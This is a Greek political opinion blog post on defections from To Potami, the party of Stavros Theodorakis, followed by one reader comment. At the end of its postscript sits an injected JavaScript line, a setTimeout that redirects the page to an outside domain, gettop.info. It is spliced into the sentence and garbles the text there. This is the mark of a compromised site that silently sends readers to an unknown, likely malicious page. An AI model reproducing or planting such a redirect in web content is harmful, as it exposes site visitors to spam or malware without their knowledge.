Στερεύει το Ποτάμι του Σταύρου Θεοδωράκη;

1
13

 

Η Κατερίνα Μάρκου αποτελεί την τρίτη απώλεια για το άλλοτε ελπιδοφόρο πολιτικό πείραμα του Σταύρου Θεοδωράκη. Προηγήθηκαν ο Χάρης Θεοχάρης και ο Ιάσων Φωτήλας, που φαίνεται να οδεύουν προς τη ΝΔ.

Η βουλευτής ανεξαρτητοποιήθηκε, δημοσιοποιώντας επιστολή προς τον επικεφαλής του Ποταμιού με την οποία τονίζει ότι ασφυκτιά στις τάξεις του, ότι δεν πιστεύει στην αυτόνομη πορεία του κόμματος και ότι θέλει να δώσει τις δυνάμεις της για την ανασυγκρότηση του προοδευτικού Κέντρου.

Μήπως, αλήθεια, το Ποτάμι έχει αρχίσει να στερεύει; Οι τρεις βουλευτές, αυτό φαίνεται να πιστεύουν. Πίεσαν τον Θοδωράκη να συνεργαστεί με άλλες πολιτικές δυνάμεις (οι δυο άνδρες με τη ΝΔ και η κυρία με το ΠΑΣΟΚ) και, όταν διεπίστωσαν πως εκείνος δεν έχει καμιά τέτοια πρόθεση, πήραν το καπελάκι τους και αποχώρησαν.

Ο ίδιος ο αρχηγός έχει άλλη άποψη. Πιστεύει πως μπορεί να κινητοποιήσει πολλούς από τους πολίτες, που δεν πήγαν να ψηφίσουν στις τελευταίες εκλογές, και να κάνει να…πιουν νερό στο Ποτάμι του. Τη γνώμη του συμμερίζονται και αρκετοί ακόμη.

Ωστόσο, άλλα κορυφαία στελέχη εκτιμούν ότι έχει εγκλωβιστεί σε αδιέξοδο, αρνούμενος κάθε προεκλογική συνεργασία. Και δεν αποκλείουν το ενδεχόμενο να έχει αποφασίσει, ως ιδρυτής του κόμματος, να πέσει αγκαλιά με το δημιούργημά του στην επόμενη εκλογική αναμέτρηση. Τι θα κάνουν; Θα χορέψουν μαζί του τον «Χορό του Ζαλόγγου»; Αποκλείεται.

Ας μην εκπλαγούμε, λοιπόν, αν υπάρξουν και νέες αποχωρήσεις προσεχώς.

Υ.Γ. Είναι προς έρευνα, βέβαια, το ποιο νέο ήθος έφεραν στην πολιτική ζωή οι βουλευτές που παραιτήθηκαν από το Ποτάμι, αλλά φρόντισαν να κρατήσουν την έδρα τους -και, φυσικά, και το μηνιάτικό τους… setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

1 ΣΧΟΛΙΟ

  1. Η αντίδραση δεν ειναι ποτε κόμμα (με θέσεις και προτάσεις).
    Άρα αφού κάνανε την πλάκα τους τώρα πάνε οπου ανήκουν (στην αριστερά του ΣΥΡΙΖΑ η στην δεξιά της ΝΔ)
    Μετα θα ακολουθήσουν οι ΑΝΕΛ (ολοι δεξιά η Ακροδεξιά)

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here